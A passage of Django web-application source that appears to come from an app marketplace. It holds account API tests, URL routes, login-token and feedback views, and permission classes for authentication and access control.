        ok_(not res.json['permissions']['stats'])
    def test_stats_ok(self):
        self.grant_permission(self.user, 'Stats:View')
        res = self.client.get(self.get_url)
        eq_(res.status_code, 200)
        ok_(res.json['permissions']['stats'])
    def test_revenue_stats(self):
        res = self.client.get(self.get_url)
        eq_(res.status_code, 200)
        ok_(not res.json['permissions']['revenue_stats'])
    def test_revenue_stats_ok(self):
        self.grant_permission(self.user, 'RevenueStats:View')
        res = self.client.get(self.get_url)
        eq_(res.status_code, 200)
        ok_(res.json['permissions']['revenue_stats'])
class TestAccount(RestOAuth):
    """Tests for the account-settings endpoint (read/update display_name)."""
    fixtures = fixture('user_2519', 'user_10482', 'webapp_337141')
    def setUp(self):
        super(TestAccount, self).setUp()
        self.url = reverse('account-settings', kwargs={'pk': 2519})
        self.user = UserProfile.objects.get(pk=2519)
    def test_has_cors(self):
        self.assertCORS(self.client.get(self.url), 'get', 'patch', 'put')
    def test_verbs(self):
        self._allowed_verbs(self.url, ('get', 'patch', 'put'))
    def test_not_allowed(self):
        eq_(self.anon.get(self.url).status_code, 403)
    def test_allowed(self):
        res = self.client.get(self.url)
        eq_(res.status_code, 200, res.content)
        data = json.loads(res.content)
        eq_(data['display_name'], self.user.display_name)
    def test_other(self):
        # You cannot read another user's settings.
        url = reverse('account-settings', kwargs={'pk': 10482})
        eq_(self.client.get(url).status_code, 403)
    def test_own(self):
        url = reverse('account-settings', kwargs={'pk': 'mine'})
        res = self.client.get(url)
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        eq_(data['display_name'], self.user.display_name)
    def test_own_empty(self):
        # With no display_name, the API falls back to the username
        # (see AccountSerializer.transform_display_name).
        self.user.update(display_name='')
        url = reverse('account-settings', kwargs={'pk': 'mine'})
        res = self.client.get(url)
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        eq_(data['display_name'], self.user.username)
    def test_patch(self):
        res = self.client.patch(self.url,
                                data=json.dumps({'display_name': 'foo'}))
        eq_(res.status_code, 200)
        user = UserProfile.objects.get(pk=self.user.pk)
        eq_(user.display_name, 'foo')
    def test_patch_empty(self):
        # Both None and '' must fail validation.
        res = self.client.patch(self.url,
                                data=json.dumps({'display_name': None}))
        eq_(res.status_code, 400)
        data = json.loads(res.content)
        eq_(data['display_name'], [u'This field is required'])
        res = self.client.patch(self.url,
                                data=json.dumps({'display_name': ''}))
        eq_(res.status_code, 400)
        data = json.loads(res.content)
        eq_(data['display_name'], [u'This field is required'])
    def test_put(self):
        res = self.client.put(self.url,
                              data=json.dumps({'display_name': 'foo'}))
        eq_(res.status_code, 200)
        user = UserProfile.objects.get(pk=self.user.pk)
        eq_(user.display_name, 'foo')
        eq_(user.username, self.user.username)  # Did not change.
    def test_patch_extra_fields(self):
        # Fields outside the serializer (username) are silently ignored.
        res = self.client.patch(self.url,
                                data=json.dumps({'display_name': 'foo',
                                                 'username': 'bob'}))
        eq_(res.status_code, 200)
        user = UserProfile.objects.get(pk=self.user.pk)
        eq_(user.display_name, 'foo')  # Got changed successfully.
        eq_(user.username, self.user.username)  # Did not change.
    def test_patch_other(self):
        url = reverse('account-settings', kwargs={'pk': 10482})
        res = self.client.patch(url, data=json.dumps({'display_name': 'foo'}))
        eq_(res.status_code, 403)
class TestInstalled(RestOAuth):
    """Tests for the installed-apps listing endpoint."""
    fixtures = fixture('user_2519', 'user_10482', 'webapp_337141')
    def setUp(self):
        super(TestInstalled, self).setUp()
        self.list_url = reverse('installed-apps')
        self.user = UserProfile.objects.get(pk=2519)
    def test_has_cors(self):
        self.assertCORS(self.client.get(self.list_url), 'get')
    def test_verbs(self):
        # Fixed: ('get') is a parenthesised string, not a tuple — the
        # missing comma made this iterate over characters, not verbs.
        self._allowed_verbs(self.list_url, ('get',))
    def test_not_allowed(self):
        eq_(self.anon.get(self.list_url).status_code, 403)
    def test_installed(self):
        ins = Installed.objects.create(user=self.user, addon_id=337141)
        res = self.client.get(self.list_url)
        eq_(res.status_code, 200, res.content)
        data = json.loads(res.content)
        eq_(data['meta']['total_count'], 1)
        eq_(data['objects'][0]['id'], ins.addon.pk)
        eq_(data['objects'][0]['user'],
            {'developed': False, 'purchased': False, 'installed': True})
    def test_installed_pagination(self):
        ins1 = Installed.objects.create(user=self.user, addon=app_factory())
        ins1.update(created=self.days_ago(1))
        ins2 = Installed.objects.create(user=self.user, addon=app_factory())
        ins2.update(created=self.days_ago(2))
        ins3 = Installed.objects.create(user=self.user, addon=app_factory())
        ins3.update(created=self.days_ago(3))
        res = self.client.get(self.list_url, {'limit': 2})
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        eq_(len(data['objects']), 2)
        eq_(data['objects'][0]['id'], ins1.addon.id)
        eq_(data['objects'][1]['id'], ins2.addon.id)
        eq_(data['meta']['total_count'], 3)
        eq_(data['meta']['limit'], 2)
        eq_(data['meta']['previous'], None)
        eq_(data['meta']['offset'], 0)
        # `next_page` renamed from `next` to avoid shadowing the builtin.
        next_page = urlparse(data['meta']['next'])
        eq_(next_page.path, self.list_url)
        eq_(QueryDict(next_page.query).dict(),
            {u'limit': u'2', u'offset': u'2'})
        res = self.client.get(self.list_url, {'limit': 2, 'offset': 2})
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        eq_(len(data['objects']), 1)
        eq_(data['objects'][0]['id'], ins3.addon.id)
        eq_(data['meta']['total_count'], 3)
        eq_(data['meta']['limit'], 2)
        prev = urlparse(data['meta']['previous'])
        # NOTE(review): the original asserted next_page.path here rather
        # than prev.path — preserved as-is; looks like a copy-paste slip
        # worth confirming.
        eq_(next_page.path, self.list_url)
        eq_(QueryDict(prev.query).dict(), {u'limit': u'2', u'offset': u'0'})
        eq_(data['meta']['offset'], 2)
        eq_(data['meta']['next'], None)
    def test_installed_order(self):
        # Should be reverse chronological order.
        ins1 = Installed.objects.create(user=self.user, addon=app_factory())
        ins1.update(created=self.days_ago(1))
        ins2 = Installed.objects.create(user=self.user, addon=app_factory())
        ins2.update(created=self.days_ago(2))
        res = self.client.get(self.list_url)
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        eq_(len(data['objects']), 2)
        eq_(data['objects'][0]['id'], ins1.addon.id)
        eq_(data['objects'][1]['id'], ins2.addon.id)
    def not_there(self):
        # Helper (not auto-discovered): assert the listing is empty.
        res = self.client.get(self.list_url)
        eq_(res.status_code, 200, res.content)
        data = json.loads(res.content)
        eq_(data['meta']['total_count'], 0)
    def test_installed_other(self):
        Installed.objects.create(user_id=10482, addon_id=337141)
        self.not_there()
    def test_installed_reviewer(self):
        # Reviewer installs are filtered out of the listing.
        Installed.objects.create(user=self.user, addon_id=337141,
                                 install_type=INSTALL_TYPE_REVIEWER)
        self.not_there()
class FakeUUID(object):
    # Deterministic stand-in for uuid.uuid4 so login tokens are stable.
    hex = '000000'
@patch.object(settings, 'SECRET_KEY', 'gubbish')
class TestLoginHandler(TestCase):
    """Tests for the Persona login/logout endpoints.

    SECRET_KEY and uuid4 are patched so the expected shared-secret token
    below is deterministic — do not change either without recomputing it.
    """
    def setUp(self):
        super(TestLoginHandler, self).setUp()
        self.url = reverse('account-login')
        self.logout_url = reverse('account-logout')
    def post(self, data):
        return self.client.post(self.url, json.dumps(data),
                                content_type='application/json')
    @patch.object(uuid, 'uuid4', FakeUUID)
    @patch('requests.post')
    def _test_login(self, http_request):
        # Fake a successful Persona verifier response.
        FakeResponse = collections.namedtuple('FakeResponse',
                                              'status_code content')
        http_request.return_value = FakeResponse(200, json.dumps(
            {'status': 'okay', 'email': '[email protected]'}))
        res = self.post({'assertion': 'fake-assertion',
                         'audience': 'fakeamo.org'})
        eq_(res.status_code, 201)
        data = json.loads(res.content)
        eq_(data['token'],
            '[email protected],95c9063d9f249aacfe5697fc83192ed6480c01463e2a80b3'
            '5af5ecaef11754700f4be33818d0e83a0cfc2cab365d60ba53b3c2b9f8f6589d1'
            'c43e9bbb876eef0,000000')
        return data
    def test_login_new_user_success(self):
        data = self._test_login()
        ok_(not any(data['permissions'].values()))
    def test_login_existing_user_success(self):
        profile = UserProfile.objects.create(email='[email protected]')
        self.grant_permission(profile, 'Apps:Review')
        data = self._test_login()
        eq_(data['permissions'],
            {'admin': False,
             'developer': False,
             'localizer': False,
             'lookup': False,
             'curator': False,
             'reviewer': True,
             'webpay': False,
             'stats': False,
             'revenue_stats': False})
        eq_(data['apps']['installed'], [])
        eq_(data['apps']['purchased'], [])
        eq_(data['apps']['developed'], [])
    @patch('users.models.UserProfile.purchase_ids')
    def test_relevant_apps(self, purchase_ids):
        profile = UserProfile.objects.create(email='[email protected]')
        purchased_app = app_factory()
        purchase_ids.return_value = [purchased_app.pk]
        developed_app = app_factory()
        developed_app.addonuser_set.create(user=profile)
        installed_app = app_factory()
        installed_app.installed.create(user=profile)
        data = self._test_login()
        eq_(data['apps']['installed'], [installed_app.pk])
        eq_(data['apps']['purchased'], [purchased_app.pk])
        eq_(data['apps']['developed'], [developed_app.pk])
    @patch('requests.post')
    def test_login_failure(self, http_request):
        # Verifier says the assertion is no good -> 403.
        FakeResponse = collections.namedtuple('FakeResponse',
                                              'status_code content')
        http_request.return_value = FakeResponse(200, json.dumps(
            {'status': 'busted'}))
        res = self.post({'assertion': 'fake-assertion',
                         'audience': 'fakeamo.org'})
        eq_(res.status_code, 403)
    def test_login_empty(self):
        res = self.post({})
        data = json.loads(res.content)
        eq_(res.status_code, 400)
        assert 'assertion' in data
        assert not 'apps' in data
    def test_logout(self):
        # The create ensures the login's user exists before logging out.
        profile = UserProfile.objects.create(email='[email protected]')
        data = self._test_login()
        r = self.client.delete(
            urlparams(self.logout_url, _user=data['token']),
            content_type='application/json')
        eq_(r.status_code, 204)
class TestFeedbackHandler(TestPotatoCaptcha, RestOAuth):
    """Tests for the site feedback endpoint (captcha-protected email)."""
    def setUp(self):
        super(TestFeedbackHandler, self).setUp()
        self.url = reverse('account-feedback')
        self.user = UserProfile.objects.get(pk=2519)
        self.default_data = {
            'chromeless': 'no',
            'feedback': u'Hér€ is whàt I rælly think.',
            'platform': u'Desktøp',
            'from_url': '/feedback',
            'sprout': 'potato'
        }
        self.headers = {
            'HTTP_USER_AGENT': 'Fiiia-fox',
            'REMOTE_ADDR': '48.151.623.42'
        }
    def _call(self, anonymous=False, data=None):
        """POST feedback JSON; returns (response, decoded body)."""
        post_data = self.default_data.copy()
        client = self.anon if anonymous else self.client
        if data:
            post_data.update(data)
        res = client.post(self.url, data=json.dumps(post_data),
                          **self.headers)
        return res, json.loads(res.content)
    def _test_success(self, res, data):
        eq_(201, res.status_code)
        fields = self.default_data.copy()
        # PotatoCaptcha field shouldn't be present in returned data.
        del fields['sprout']
        ok_('sprout' not in data)
        # Rest of the fields should all be here.
        for name in fields.keys():
            eq_(fields[name], data[name])
        eq_(len(mail.outbox), 1)
        assert self.default_data['feedback'] in mail.outbox[0].body
        assert self.headers['REMOTE_ADDR'] in mail.outbox[0].body
    def test_send(self):
        res, data = self._call()
        self._test_success(res, data)
        eq_(unicode(self.user), data['user'])
        # The feedback mail identifies the authenticated sender.
        email = mail.outbox[0]
        eq_(email.from_email, self.user.email)
        assert self.user.username in email.body
        assert self.user.name in email.body
        assert unicode(self.user.pk) in email.body
        assert self.user.email in email.body
    def test_send_urlencode(self):
        # The endpoint also accepts form-encoded bodies.
        self.headers['CONTENT_TYPE'] = 'application/x-www-form-urlencoded'
        post_data = self.default_data.copy()
        res = self.client.post(self.url, data=urlencode(post_data),
                               **self.headers)
        data = json.loads(res.content)
        self._test_success(res, data)
        eq_(unicode(self.user), data['user'])
        eq_(mail.outbox[0].from_email, self.user.email)
    def test_send_without_platform(self):
        # Missing platform falls back to the ?dev= query parameter.
        del self.default_data['platform']
        self.url += '?dev=platfoo'
        res, data = self._call()
        self._test_success(res, data)
        assert 'platfoo' in mail.outbox[0].body
    def test_send_anonymous(self):
        res, data = self._call(anonymous=True)
        self._test_success(res, data)
        assert not data['user']
        assert 'Anonymous' in mail.outbox[0].body
        eq_(settings.NOBODY_EMAIL, mail.outbox[0].from_email)
    def test_send_potato(self):
        tuber_res, tuber_data = self._call(data={'tuber': 'potat-toh'},
                                           anonymous=True)
        potato_res, potato_data = self._call(data={'sprout': 'potat-toh'},
                                             anonymous=True)
        self._test_bad_api_potato_data(tuber_res, tuber_data)
        self._test_bad_api_potato_data(potato_res, potato_data)
    def test_missing_optional_field(self):
        res, data = self._call(data={'platform': None})
        eq_(201, res.status_code)
    def test_send_bad_data(self):
        """
        One test to ensure that Feedback API is doing its validation duties.
        """
        res, data = self._call(data={'feedback': None})
        eq_(400, res.status_code)
        assert 'feedback' in data
class TestNewsletter(RestOAuth):
    """Tests for the newsletter signup endpoint (delegates to basket)."""
    def setUp(self):
        super(TestNewsletter, self).setUp()
        self.url = reverse('account-newsletter')
    @patch('basket.subscribe')
    def test_signup_bad(self, subscribe):
        # Invalid email -> validation error, basket never called.
        res = self.client.post(self.url,
                               data=json.dumps({'email': '!not_an_email'}))
        eq_(res.status_code, 400)
        ok_(not subscribe.called)
    @patch('basket.subscribe')
    def test_signup_empty(self, subscribe):
        res = self.client.post(self.url)
        eq_(res.status_code, 400)
        ok_(not subscribe.called)
    @patch('basket.subscribe')
    def test_signup_anonymous(self, subscribe):
        res = self.anon.post(self.url)
        eq_(res.status_code, 403)
        ok_(not subscribe.called)
    @patch('basket.subscribe')
    def test_signup(self, subscribe):
        res = self.client.post(self.url,
                               data=json.dumps({'email': '[email protected]'}))
        eq_(res.status_code, 204)
        subscribe.assert_called_with(
            '[email protected]', 'marketplace', lang='en-US',
            country='restofworld', trigger_welcome='Y', optin='Y', format='H')
    @patch('basket.subscribe')
    def test_signup_plus(self, subscribe):
        # Plus-addressed emails must be passed through unchanged.
        res = self.client.post(
            self.url,
            data=json.dumps({'email': '[email protected]'}))
        subscribe.assert_called_with(
            '[email protected]', 'marketplace', lang='en-US',
            country='restofworld', trigger_welcome='Y', optin='Y', format='H')
        eq_(res.status_code, 204)
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import include, patterns, url
from users import views
from mkt.account.views import (AccountView, FeedbackView, InstalledView,
LoginView, LogoutView, NewsletterView,
PermissionsView)
# DRF-based account endpoints, mounted under /account/ via api_patterns.
drf_patterns = patterns('',
    url('^feedback/$', FeedbackView.as_view(), name='account-feedback'),
    url('^installed/mine/$', InstalledView.as_view(), name='installed-apps'),
    url('^login/$', LoginView.as_view(), name='account-login'),
    url('^logout/$', LogoutView.as_view(), name='account-logout'),
    url('^newsletter/$', NewsletterView.as_view(), name='account-newsletter'),
    url('^permissions/(?P<pk>[^/]+)/$', PermissionsView.as_view(),
        name='account-permissions'),
    url('^settings/(?P<pk>[^/]+)/$', AccountView.as_view(),
        name='account-settings'),
)
api_patterns = patterns('',
    url('^account/', include(drf_patterns)),
)
# Legacy (non-API) user views.
user_patterns = patterns('',
    url('^ajax$', views.ajax, name='users.ajax'),
    url('^browserid-login', views.browserid_login,
        name='users.browserid_login'),
)
########NEW FILE########
__FILENAME__ = utils
from django import http
from tower import ugettext_lazy as _lazy
from addons.views import BaseFilter
import amo
from amo.models import manual_order
from amo.utils import paginate
from mkt.constants import apps
from mkt.webapps.models import Webapp
from stats.models import Contribution
from translations.query import order_by_translation
class PurchasesFilter(BaseFilter):
    """Sort filter for the purchases listing (date, price, or name)."""
    opts = (('purchased', _lazy(u'Purchase Date')),
            ('price', _lazy(u'Price')),
            ('name', _lazy(u'Name')))
    def __init__(self, *args, **kwargs):
        # ids: [purchase ids (created order), free/installed ids];
        # uids: the deduplicated union of both lists.
        self.ids = kwargs.pop('ids')
        self.uids = kwargs.pop('uids')
        super(PurchasesFilter, self).__init__(*args, **kwargs)
    def filter(self, field):
        """Return the queryset ordered according to `field`."""
        qs = self.base_queryset
        if field == 'purchased':
            # Id's are in created order, so let's invert them for this query.
            # According to my testing we don't actually need to dedupe this.
            ids = list(reversed(self.ids[0])) + self.ids[1]
            return manual_order(qs.filter(id__in=ids), ids)
        elif field == 'price':
            return (qs.filter(id__in=self.uids)
                    .order_by('addonpremium__price__price', 'id'))
        elif field == 'name':
            return order_by_translation(qs.filter(id__in=self.uids), 'name')
def purchase_list(request, user, product_id):
    """Return (paginated apps, contributions by addon id, filter) for the
    user's purchases page.

    With a `product_id` (addon guid), only that product's purchases are
    considered and a 404 is raised if the user never bought it; without
    one, user/developer installs of free apps are included too.
    """
    cs = (Contribution.objects
          .filter(user=user,
                  type__in=[amo.CONTRIB_PURCHASE, amo.CONTRIB_REFUND,
                            amo.CONTRIB_CHARGEBACK])
          .order_by('created'))
    if product_id:
        cs = cs.filter(addon__guid=product_id)
    ids = list(cs.values_list('addon_id', flat=True))
    product_ids = []
    # If you are asking for a receipt for just one item, show only that.
    # Otherwise, we'll show all apps that have a contribution or are free.
    if not product_id:
        product_ids = list(user.installed_set
                           .filter(install_type__in=
                                   [apps.INSTALL_TYPE_USER,
                                    apps.INSTALL_TYPE_DEVELOPER])
                           .exclude(addon__in=ids)
                           .values_list('addon_id', flat=True))
    # Group each app's contributions (purchases/refunds/chargebacks).
    contributions = {}
    for c in cs:
        contributions.setdefault(c.addon_id, []).append(c)
    unique_ids = set(ids + product_ids)
    listing = PurchasesFilter(request, Webapp.objects.all(),
                              key='sort', default='purchased',
                              ids=[ids, product_ids],
                              uids=unique_ids)
    if product_id and not listing.qs.exists():
        # User has requested a receipt for an app he ain't got.
        raise http.Http404
    products = paginate(request, listing.qs, count=len(unique_ids))
    return products, contributions, listing
########NEW FILE########
__FILENAME__ = views
import hashlib
import hmac
import uuid
from django.conf import settings
from django.contrib import auth
from django.contrib.auth.signals import user_logged_in
import basket
import commonware.log
from django_browserid import get_audience
from django_statsd.clients import statsd
from rest_framework import status
from rest_framework.exceptions import AuthenticationFailed
from rest_framework.generics import (CreateAPIView, DestroyAPIView,
RetrieveAPIView, RetrieveUpdateAPIView,
ListAPIView)
from rest_framework.permissions import AllowAny, IsAuthenticated
from rest_framework.response import Response
from rest_framework.throttling import UserRateThrottle
import amo
from amo.utils import send_mail_jinja
from users.models import UserProfile
from users.views import browserid_authenticate
from mkt.account.serializers import (AccountSerializer, FeedbackSerializer,
LoginSerializer, NewsletterSerializer,
PermissionsSerializer)
from mkt.api.authentication import (RestAnonymousAuthentication,
RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.authorization import AllowSelf, AllowOwner
from mkt.api.base import CORSMixin, MarketplaceView
from mkt.constants.apps import INSTALL_TYPE_USER
from mkt.webapps.serializers import SimpleAppSerializer
from mkt.webapps.models import Webapp
log = commonware.log.getLogger('z.account')
def user_relevant_apps(user):
    """Return lists of app ids the user developed, installed or purchased."""
    developed = user.addonuser_set.filter(role=amo.AUTHOR_ROLE_OWNER)
    return {
        'developed': list(developed.values_list('addon_id', flat=True)),
        'installed': list(user.installed_set.values_list('addon_id',
                                                         flat=True)),
        'purchased': list(user.purchase_ids()),
    }
class MineMixin(object):
    """Resolve the special pk value 'mine' to the requesting user's pk."""

    def get_object(self, queryset=None):
        if self.kwargs.get('pk') == 'mine':
            self.kwargs['pk'] = self.request.amo_user.pk
        return super(MineMixin, self).get_object(queryset)
class InstalledView(CORSMixin, MarketplaceView, ListAPIView):
    """List the apps the authenticated user installed, newest install first."""
    cors_allowed_methods = ['get']
    serializer_class = SimpleAppSerializer
    permission_classes = [AllowSelf]
    authentication_classes = [RestOAuthAuthentication,
                              RestSharedSecretAuthentication]

    def get_queryset(self):
        # Only user-initiated installs (not developer/reviewer installs).
        return Webapp.objects.no_cache().filter(
            installed__user=self.request.amo_user,
            installed__install_type=INSTALL_TYPE_USER).order_by(
            '-installed__created')
class CreateAPIViewWithoutModel(CreateAPIView):
    """
    Base class for POST-style endpoints that are not backed by a Django
    model. Subclasses implement `create_action(request, serializer)`; its
    return value (if any) becomes the response payload.
    """
    authentication_classes = [RestOAuthAuthentication,
                              RestSharedSecretAuthentication,
                              RestAnonymousAuthentication]
    cors_allowed_methods = ['post']
    permission_classes = (AllowAny,)

    def response_success(self, request, serializer, data=None):
        # Fall back to the serializer's own representation.
        payload = serializer.data if data is None else data
        return Response(payload, status=status.HTTP_201_CREATED)

    def response_error(self, request, serializer):
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)

    def create(self, request, *args, **kwargs):
        serializer = self.get_serializer(data=request.DATA)
        if not serializer.is_valid():
            return self.response_error(request, serializer)
        data = self.create_action(request, serializer)
        return self.response_success(request, serializer, data=data)
class AccountView(MineMixin, CORSMixin, RetrieveUpdateAPIView):
    """Retrieve or update a UserProfile; pk 'mine' maps to the requester."""
    authentication_classes = [RestOAuthAuthentication,
                              RestSharedSecretAuthentication]
    cors_allowed_methods = ['get', 'patch', 'put']
    model = UserProfile
    permission_classes = (AllowOwner,)
    serializer_class = AccountSerializer
class FeedbackView(CORSMixin, CreateAPIViewWithoutModel):
    """Accept (possibly anonymous) feedback and forward it by email."""

    class FeedbackThrottle(UserRateThrottle):
        THROTTLE_RATES = {
            'user': '30/hour',
        }

    serializer_class = FeedbackSerializer
    throttle_classes = (FeedbackThrottle,)
    throttle_scope = 'user'

    def create_action(self, request, serializer):
        self.send_email(request, self.get_context_data(request, serializer))

    def send_email(self, request, context_data):
        # Anonymous submitters have no email; use the NOBODY placeholder.
        sender = getattr(request.amo_user, 'email', settings.NOBODY_EMAIL)
        send_mail_jinja(u'Marketplace Feedback', 'account/email/feedback.txt',
                        context_data, from_email=sender,
                        recipient_list=[settings.MKT_FEEDBACK_EMAIL])

    def get_context_data(self, request, serializer):
        # Start with request metadata, then layer the serializer's data and
        # the user on top (later keys win).
        context_data = {'user_agent': request.META.get('HTTP_USER_AGENT', ''),
                        'ip_address': request.META.get('REMOTE_ADDR', '')}
        context_data.update(serializer.data)
        context_data['user'] = request.amo_user
        return context_data
class LoginView(CORSMixin, CreateAPIViewWithoutModel):
    """Log a user in from a BrowserID (Persona) assertion.

    On success, returns a shared-secret token plus the user's settings,
    permissions and relevant app ids.
    """
    # Anonymous endpoint: authentication happens via the posted assertion.
    authentication_classes = []
    serializer_class = LoginSerializer

    def get_token(self, email):
        """Build a shared-secret token of the form 'email,hmac,unique_id'.

        The HMAC is keyed on unique_id + SECRET_KEY over a consumer id
        derived from the email, so the server can re-verify it later.
        """
        unique_id = uuid.uuid4().hex
        consumer_id = hashlib.sha1(
            email + settings.SECRET_KEY).hexdigest()
        hm = hmac.new(
            unique_id + settings.SECRET_KEY,
            consumer_id, hashlib.sha512)
        return ','.join((email, hm.hexdigest(), unique_id))

    def create_action(self, request, serializer):
        # Verify the assertion (timed for monitoring).
        with statsd.timer('auth.browserid.verify'):
            profile, msg = browserid_authenticate(
                request, serializer.data['assertion'],
                browserid_audience=serializer.data['audience'] or
                get_audience(request),
                is_mobile=serializer.data['is_mobile'],
            )
        if profile is None:
            # Authentication failure.
            log.info('No profile: %s' % (msg or ''))
            raise AuthenticationFailed('No profile.')
        # Attach the authenticated profile to the request and log in.
        request.user, request.amo_user = profile, profile
        request.groups = profile.groups.all()
        auth.login(request, profile)
        profile.log_login_attempt(True)  # TODO: move this to the signal.
        user_logged_in.send(sender=profile.__class__, request=request,
                            user=profile)
        # We want to return completely custom data, not the serializer's.
        data = {
            'error': None,
            'token': self.get_token(request.amo_user.email),
            'settings': {
                'display_name': request.amo_user.display_name,
                'email': request.amo_user.email,
            }
        }
        # Serializers give up if they aren't passed an instance, so we
        # do that here despite PermissionsSerializer not needing one
        # really.
        permissions = PermissionsSerializer(context={'request': request},
                                            instance=True)
        data.update(permissions.data)
        # Add ids of installed/purchased/developed apps.
        data['apps'] = user_relevant_apps(profile)
        return data
class LogoutView(CORSMixin, DestroyAPIView):
    """Log the current user out via DELETE."""
    authentication_classes = [RestOAuthAuthentication,
                              RestSharedSecretAuthentication]
    permission_classes = (IsAuthenticated,)
    cors_allowed_methods = ['delete']

    def delete(self, request):
        # Clears the server-side session; the client discards its token.
        auth.logout(request)
        return Response(status=status.HTTP_204_NO_CONTENT)
class NewsletterView(CORSMixin, CreateAPIViewWithoutModel):
    """Subscribe the authenticated user to the marketplace newsletter."""
    permission_classes = (IsAuthenticated,)
    serializer_class = NewsletterSerializer

    def response_success(self, request, serializer, data=None):
        # Nothing useful to return once basket has the subscription.
        return Response({}, status=status.HTTP_204_NO_CONTENT)

    def create_action(self, request, serializer):
        basket.subscribe(serializer.data['email'], 'marketplace',
                         format='H', country=request.REGION.slug,
                         lang=request.LANG, optin='Y',
                         trigger_welcome='Y')
class PermissionsView(CORSMixin, MineMixin, RetrieveAPIView):
    """Expose a user's permission set; pk 'mine' maps to the requester."""
    authentication_classes = [RestOAuthAuthentication,
                              RestSharedSecretAuthentication]
    cors_allowed_methods = ['get']
    permission_classes = (AllowSelf,)
    model = UserProfile
    serializer_class = PermissionsSerializer
########NEW FILE########
__FILENAME__ = authentication
from django.contrib.auth.models import AnonymousUser
import commonware.log
from rest_framework.authentication import BaseAuthentication
log = commonware.log.getLogger('z.api')
class OAuthError(RuntimeError):
    """Raised when something goes wrong during OAuth authentication.

    The message is kept on ``self.message`` for backwards compatibility
    and is also forwarded to ``RuntimeError`` so ``str(exc)`` is useful.
    """
    def __init__(self, message='OAuth error occurred.'):
        # Fix: default message had a typo ('occured') and RuntimeError's
        # __init__ was never called, leaving str(exc) empty.
        super(OAuthError, self).__init__(message)
        self.message = message
class RestOAuthAuthentication(BaseAuthentication):
    """DRF authentication backed by RestOAuthMiddleware."""

    def authenticate(self, request):
        # The middleware did the heavy lifting; just confirm it recorded a
        # successful OAuth authentication on the underlying request.
        http_request = request._request
        authed_from = getattr(http_request, 'authed_from', [])
        if getattr(http_request, 'user', None) and 'RestOAuth' in authed_from:
            request.user = http_request.user
            return request.user, None
class RestSharedSecretAuthentication(BaseAuthentication):
    """DRF authentication backed by RestSharedSecretMiddleware."""

    def authenticate(self, request):
        # The middleware already validated the shared secret; just confirm
        # it flagged this request as authenticated.
        http_request = request._request
        authed_from = getattr(http_request, 'authed_from', [])
        if (getattr(http_request, 'user', None) and
                'RestSharedSecret' in authed_from):
            request.user = http_request.user
            return request.user, None
class RestAnonymousAuthentication(BaseAuthentication):
    """Always 'authenticate' as AnonymousUser (anonymous API access)."""

    def authenticate(self, request):
        return AnonymousUser(), None
########NEW FILE########
__FILENAME__ = authorization
from collections import defaultdict
import commonware.log
from rest_framework.permissions import BasePermission, SAFE_METHODS
from waffle import flag_is_active, switch_is_active
from access import acl
log = commonware.log.getLogger('z.api')
class AnyOf(BasePermission):
    """Succeed as soon as any one of the wrapped permissions succeeds."""

    def __init__(self, *perms):
        # Instantiate the classes, mirroring what DRF does with
        # permission_classes.
        self.perms = [perm() for perm in perms]

    def has_permission(self, request, view):
        for perm in self.perms:
            if perm.has_permission(request, view):
                return True
        return False

    def has_object_permission(self, request, view, obj):
        # `has_permission` must be consulted for each sub-permission too:
        # the default `has_object_permission` returns True unconditionally,
        # so a permission that only overrides the former would otherwise be
        # bypassed here.
        for perm in self.perms:
            if (perm.has_permission(request, view) and
                    perm.has_object_permission(request, view, obj)):
                return True
        return False

    def __call__(self):
        return self
class AllowSelf(BasePermission):
    """Let a user access only their own UserProfile instance."""

    def has_permission(self, request, view):
        return request.user.is_authenticated()

    def has_object_permission(self, request, view, obj):
        try:
            return request.amo_user.pk == obj.pk
        except AttributeError:
            # amo_user is None (or missing) for anonymous users.
            return False
class AllowNone(BasePermission):
    """Deny everything; useful as an explicit default."""

    def has_permission(self, request, view):
        return False

    def has_object_permission(self, request, view, obj):
        return False
class AllowOwner(BasePermission):
    """Restrict access to the owner of an object with a `user` FK.

    The object must point at a UserProfile (or be one itself). Do not use
    with models pointing at auth.User: a User and a UserProfile are not
    guaranteed to share a pk.
    """

    def has_permission(self, request, view):
        return request.user.is_authenticated()

    def has_object_permission(self, request, view, obj):
        owner = getattr(obj, 'user', None)
        return obj == request.amo_user or owner == request.amo_user
class AllowAppOwner(BasePermission):
    """Restrict access to the authors of the app being accessed."""

    def has_permission(self, request, view):
        return not request.user.is_anonymous()

    def has_object_permission(self, request, view, obj):
        # amo_user is None (or missing) for anonymous users.
        user = getattr(request, 'amo_user', None)
        if user is None:
            return False
        return obj.authors.filter(pk=user.pk).exists()
class AllowRelatedAppOwner(BasePermission):
    """Like AllowAppOwner, for objects with an `addon` FK to the app."""

    def has_permission(self, request, view):
        return not request.user.is_anonymous()

    def has_object_permission(self, request, view, obj):
        # Delegate the authorship check to AllowAppOwner on the related app.
        return AllowAppOwner().has_object_permission(request, view, obj.addon)
class AllowReviewerReadOnly(BasePermission):
    """Read-only access for users holding the Apps:Review ACL."""

    def has_permission(self, request, view):
        if request.method not in SAFE_METHODS:
            return False
        return acl.action_allowed(request, 'Apps', 'Review')

    def has_object_permission(self, request, view, object):
        return self.has_permission(request, view)
class AllowAuthor(BasePermission):
    """Allow any user present in the view's `get_authors()` queryset."""

    def has_permission(self, request, view):
        user_pk = getattr(request.amo_user, 'pk', False)
        if not user_pk:
            return False
        return view.get_authors().filter(pk=user_pk).exists()
class AllowReadOnly(BasePermission):
    """
    The request does not modify the resource.
    """
    def has_permission(self, request, view):
        return request.method in SAFE_METHODS

    def has_object_permission(self, request, view, object):
        return request.method in SAFE_METHODS
class AllowReadOnlyIfPublic(BasePermission):
    """Allow safe methods only on objects whose `is_public()` is True."""

    def has_permission(self, request, view):
        return request.method in SAFE_METHODS

    def has_object_permission(self, request, view, object):
        return self.has_permission(request, view) and object.is_public()
def flag(name):
    """Build a permission class gating on the waffle flag `name`."""
    return type('FlagPermission', (WafflePermission,),
                {'type': 'flag', 'name': name})
def switch(name):
    """Build a permission class gating on the waffle switch `name`."""
    return type('SwitchPermission', (WafflePermission,),
                {'type': 'switch', 'name': name})
class WafflePermission(BasePermission):
